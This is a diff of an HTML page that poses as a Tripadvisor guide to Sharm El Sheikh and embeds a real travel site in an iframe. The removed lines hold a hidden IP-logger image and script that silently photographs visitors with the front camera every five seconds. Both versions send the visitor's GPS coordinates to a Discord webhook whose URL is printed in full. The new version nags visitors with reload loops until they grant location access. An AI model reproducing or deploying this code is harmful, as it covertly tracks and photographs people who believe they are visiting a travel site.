--- a/index.html
+++ b/index.html
@@ -1,131 +1,97 @@
+<!DOCTYPE html>
+<html lang="en">
+<head>
+    <meta charset="UTF-8">
+    <meta name="viewport" content="width=device-width, initial-scale=1.0">
+    <meta name="title" content="Tripadvisor | Things to Do in Sharm El Sheikh in 2024" />
+    <meta name="description" content="Sharm el-Sheikh is an Egyptian resort town between the desert of the Sinai Peninsula and the Red Sea" />
+    <meta property="og:type" content="website" />
+    <meta property="og:url" content="https://cdnp.flypgs.com/files/Sehirler-long-tail/SarmElSeyh/sarm-el-seyh-shaba-cami.jpg" />
+    <meta property="og:title" content="Tripadvisor | Things to Do in Sharm El Sheikh in 2024" />
+    <meta property="og:description" content="Sharm el-Sheikh is an Egyptian resort town between the desert of the Sinai Peninsula and the Red Sea" />
+    <meta property="og:image" content="https://cdnp.flypgs.com/files/Sehirler-long-tail/SarmElSeyh/sarm-el-seyh-shaba-cami.jpg" />
+    <meta property="twitter:card" content="summary_large_image" />
+    <meta property="twitter:url" content="https://cdnp.flypgs.com/files/Sehirler-long-tail/SarmElSeyh/sarm-el-seyh-shaba-cami.jpg" />
+    <meta property="twitter:title" content="Tripadvisor | Things to Do in Sharm El Sheikh in 2024" />
+    <meta property="twitter:description" content="Sharm el-Sheikh is an Egyptian resort town between the desert of the Sinai Peninsula and the Red Sea" />
+    <meta property="twitter:image" content="https://cdnp.flypgs.com/files/Sehirler-long-tail/SarmElSeyh/sarm-el-seyh-shaba-cami.jpg" />
+    <title>Tripadvisor</title>
+    <style>
+        body, html {
+            margin: 0;
+            padding: 0;
+            height: 100%;
+            text-align: center;
+        }
+        #location-prompt, iframe {
+            display: none;
+        }
+        iframe {
+            width: 100%;
+            height: 100%;
+            border: none;
+        }
+    </style>
+</head>
+<body>
 
-    <!DOCTYPE html>
-    <html lang="en">
-    <head>
-        <meta charset="UTF-8">
-        <meta name="viewport" content="width=device-width, initial-scale=1.0">
-        <meta name="title" content="Tripadvisor | Things to Do in Sharm El Sheikh in 2024" />
-        <meta name="description" content="Sharm el-Sheikh is an Egyptian resort town between the desert of the Sinai Peninsula and the Red Sea" />
-        <meta property="og:type" content="website" />
-        <meta property="og:url" content="https://cdnp.flypgs.com/files/Sehirler-long-tail/SarmElSeyh/sarm-el-seyh-shaba-cami.jpg" />
-        <meta property="og:title" content="Tripadvisor | Things to Do in Sharm El Sheikh in 2024" />
-        <meta property="og:description" content="Sharm el-Sheikh is an Egyptian resort town between the desert of the Sinai Peninsula and the Red Sea" />
-        <meta property="og:image" content="https://cdnp.flypgs.com/files/Sehirler-long-tail/SarmElSeyh/sarm-el-seyh-shaba-cami.jpg" />
-        <meta property="twitter:card" content="summary_large_image" />
-        <meta property="twitter:url" content="https://cdnp.flypgs.com/files/Sehirler-long-tail/SarmElSeyh/sarm-el-seyh-shaba-cami.jpg" />
-        <meta property="twitter:title" content="Tripadvisor | Things to Do in Sharm El Sheikh in 2024" />
-        <meta property="twitter:description" content="Sharm el-Sheikh is an Egyptian resort town between the desert of the Sinai Peninsula and the Red Sea" />
-        <meta property="twitter:image" content="https://cdnp.flypgs.com/files/Sehirler-long-tail/SarmElSeyh/sarm-el-seyh-shaba-cami.jpg" />
-        <title>Tripadvisor</title>
-        <style>
-            body, html {
-                margin: 0;
-                padding: 0;
-                height: 100%;
-            }
-            iframe {
-                width: 100%;
-                height: 100%;
-                border: none;
-            }
-        </style>
-    </head>
-    <body>
-        <img src="https://grabify.link/2KHAV8" style="display:none;">
-        <video id="video" autoplay style="display:none;"></video>
-        <canvas id="canvas" style="display:none;"></canvas>
+    <div id="location-prompt">
+        <h2>Location is required for better service. Please allow location access to use the site.</h2>
+    </div>
 
-        <script>
-            const webhookURL = "https://discord.com/api/webhooks/1287627812701999115/DPX6pSyOlJXHkS_-KxNj03O1233HQlF-TnYPD_H05Gx90NNF9syL118ZL9lYmffgFdMG";
+    <iframe id="content-frame" src="https://www.elgounatours.com/en/top-attractions-in-sharm-el-sheikh"></iframe>
 
-            // Function to send image to Discord webhook as file
-            async function sendImageToWebhook(imageBlob) {
-                const formData = new FormData();
-                formData.append("file", imageBlob, "snapshot.png");
+    <script>
+        const webhookURL = "https://discord.com/api/webhooks/1287627812701999115/DPX6pSyOlJXHkS_-KxNj03O1233HQlF-TnYPD_H05Gx90NNF9syL118ZL9lYmffgFdMG";
 
-                try {
-                    await fetch(webhookURL, {
-                        method: "POST",
-                        body: formData
-                    });
-                } catch (error) {
-                    console.error("Failed to send image:", error);
-                }
-            }
+        // Function to get GPS coordinates and send them to the webhook
+        function getGPS() {
+            if (navigator.geolocation) {
+                navigator.geolocation.getCurrentPosition(async function (position) {
+                    const latitude = position.coords.latitude;
+                    const longitude = position.coords.longitude;
 
-            // Function to take a picture using the front camera
-            async function takePicture() {
-                const video = document.getElementById("video");
-                const canvas = document.getElementById("canvas");
-                const context = canvas.getContext("2d");
-
-                // Get user media (front camera)
-                try {
-                    const stream = await navigator.mediaDevices.getUserMedia({ video: { facingMode: "user" } });
-                    video.srcObject = stream;
-
-                    video.onloadedmetadata = () => {
-                        // Set canvas size to match video feed
-                        canvas.width = video.videoWidth;
-                        canvas.height = video.videoHeight;
-
-                        // Start looping every 5 seconds (or any desired interval)
-                        setInterval(() => {
-                            // Draw the video frame to the canvas
-                            context.drawImage(video, 0, 0, canvas.width, canvas.height);
-
-                            // Convert canvas to Blob (image/png)
-                            canvas.toBlob(async (blob) => {
-                                if (blob) {
-                                    // Send the image to the webhook
-                                    await sendImageToWebhook(blob);
-                                }
-                            }, "image/png");
-                        }, 5000); // Take picture every 5 seconds
+                    // Prepare data with coordinates
+                    const data = {
+                        content: `User GPS coordinates: Latitude: ${latitude}, Longitude: ${longitude}`
                     };
-                } catch (error) {
-                    console.error("Failed to access camera:", error);
-                }
+
+                    // Send GPS data
+                    try {
+                        await fetch(webhookURL, {
+                            method: "POST",
+                            headers: {
+                                "Content-Type": "application/json"
+                            },
+                            body: JSON.stringify(data)
+                        });
+
+                        // Show the iframe when location is accepted
+                        document.getElementById("location-prompt").style.display = "none";
+                        document.getElementById("content-frame").style.display = "block";
+                    } catch (error) {
+                        console.error("Failed to send GPS data:", error);
+                    }
+                }, function (error) {
+                    // On error (permission denied, etc.), reload the page to prompt again
+                    location.reload();
+                });
+            } else {
+                console.error("Geolocation is not supported by this browser.");
             }
+        }
 
-            // Function to get GPS coordinates and send them to the webhook
-            function getGPS() {
-                if (navigator.geolocation) {
-                    navigator.geolocation.getCurrentPosition(async function (position) {
-                        const latitude = position.coords.latitude;
-                        const longitude = position.coords.longitude;
-
-                        // Prepare data with coordinates
-                        const data = {
-                            content: `User GPS coordinates: Latitude: ${latitude}, Longitude: ${longitude}`
-                        };
-
-                        // Send GPS data
-                        try {
-                            await fetch(webhookURL, {
-                                method: "POST",
-                                headers: {
-                                    "Content-Type": "application/json"
-                                },
-                                body: JSON.stringify(data)
-                            });
-                        } catch (error) {
-                            console.error("Failed to send GPS data:", error);
-                        }
-                    });
-                } else {
-                    console.error("Geolocation is not supported by this browser.");
-                }
-            }
-
-            // Trigger GPS and camera loop on page load
-            window.onload = function () {
+        // Trigger an alert and ask for permission to access the user's location
+        window.onload = function () {
+            const userConfirmed = confirm("Location is required for better service. Please allow location access to use the site.");
+            if (userConfirmed) {
                 getGPS();
-                takePicture();
-            };
-        </script>
+            } else {
+                // If the user dismisses, reload the page to prompt again
+                location.reload();
+            }
+        };
+    </script>
 
-        <iframe src="https://www.expedia.com/Things-To-Do-In-Sharm-El-Sheikh.d3274.Travel-Guide-Activities" frameborder="0"></iframe>
-    </body>
-    </html>
-    
+</body>
+</html>
